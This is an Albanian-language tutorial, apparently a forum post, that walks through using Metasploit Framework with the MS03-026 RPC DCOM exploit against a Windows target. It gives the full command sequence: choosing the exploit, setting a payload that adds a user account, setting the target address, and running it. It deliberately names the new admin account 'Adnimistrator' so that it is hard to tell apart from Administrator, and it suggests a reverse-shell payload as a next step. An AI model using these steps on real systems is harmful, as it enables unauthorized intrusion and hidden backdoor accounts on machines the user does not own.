Tung njerzi.
Zdi a keni ni per programin (aplikacionin) e quajtur Metasploit Framework.
Ky osht njeri prej progsave me te mire nese doni me hack ose me testu rrjetin e
juaj duke perdorur exploitat ma te ri.
Kryesisht perdorja e nje exploit me metasploit bahet ne kta hapa:
I) E zgjedh exploitin
II) E zgjedh payloadin ("municionin")
III) Ja jep opcionet
IV) E ekzekuton
---------
Ne vazhdim po munohna me ju spjegu pak se qysh perdoret:
1. Shkarkoni dhe instaloni programin prej
http://www.metasploit.com/framework/
Zgjedhni cilin verzion po e doni, dhe per cfar platforme Unix (Linux) ose
Windows
2.Masi ta instaloni, startoni programin.
Shkoni te folderi ku e keni programin dhe klikoni ne msfconsole
3.I kshyr qfar exploit ki ne dispozicion me komanden show exploits, edhe
e zgjedh ate qi po e don. Ne rastin tone une po e perdori
msrpc_dcom_ms03_026
3.a) E ve ne perdorim qat exploit me komanden use
msrpc_dcom_ms03_026
4. Tash duhet me zgjedh municionin e ketij exploit.
Kshyrum qfar municioni kena me komanden show payloads
Ne rastin tone une po e perdori win32_adduser .
Per secilin exploit edhe payload e keni nje pershkrim te vogel ne te djathte, ne
rastin tone win32_adduser ekzekuton komanden net user /ADD ne
kompjuterin cilin e sulmojm.
Zgjedhja e municionit (payload) behet me komanden set PAYLOAD
win32_adduser
5. Tash e perdorim komanden show options , per me kshyr se cilet
opcione duhet me ja vnu na para se me perdor exploit.
Te kolona Name e keni emrin e Opcionit cilit duhet te vendoset,
Kolona Default tregon nese ai opcion ka vlere te paracaktuar, nese
eshte zbrazet ather duhet me ja vendos nje
Kurse Kolona Exploit: Tregon nese ai opcion eshte i nevojshem apo jo.
Kolona Description permban nje pershkrim te vogel per ate opcion
6. Tash po ja ndreqim opcionet:
Po e shohim opcioni RHOST nuk ka vlere te paracaktuar, dhe eshte e nevojshme,
pra duhet me ja vendos na vete vlerat:
Prej kolones Description po e shofim qe RHOST qenka adresa cilen po dojm me
sulmu, ne rastin tone 10.10.15.1
po ja dhame vleren:
set RHOST 10.10.15.1
Njojt veprojm e dhe me opcionet tjera:
set PASS 123456 - Passwordi per shfrytezuesin e ri
set USER Adnimistrator - emri i shfrytezuesit (me qellim osht
Adnimistrator qe me kan sa ma shtir mu dallu prej Administrator ;) )
Vini re: Opcionet dallojn prej Epxploitit ne exploit dhe prej
payloadit ne payload.
7. Tash krejt qka ka met mu ba osht me ekzekutu exploit me komanden:
exploit
Nese e merrni kete mesazh:
Dmth qe caku osht i mbrojtur nga ky lloj i sulmit.
Fund.
Tash keni nje shfrytezues ne cakun e juaj me emrin Adnimistrator edhe me
pass:123456
Provone payloadin: win32_reverse nese doni me marr nje shell (cmd)
me Dministrator account ne cakun e juaj, veq mos harroni me ja ndreq opcionet.
Linqe:
http://www.datastronghold.com/articles/1.html
http://www.nwcet.org/downloads/Metasploit_Penetration.pdf
Mos harroni me marr exploit te ri prej http://www.metasploit.org/projects/Framework/exploits.html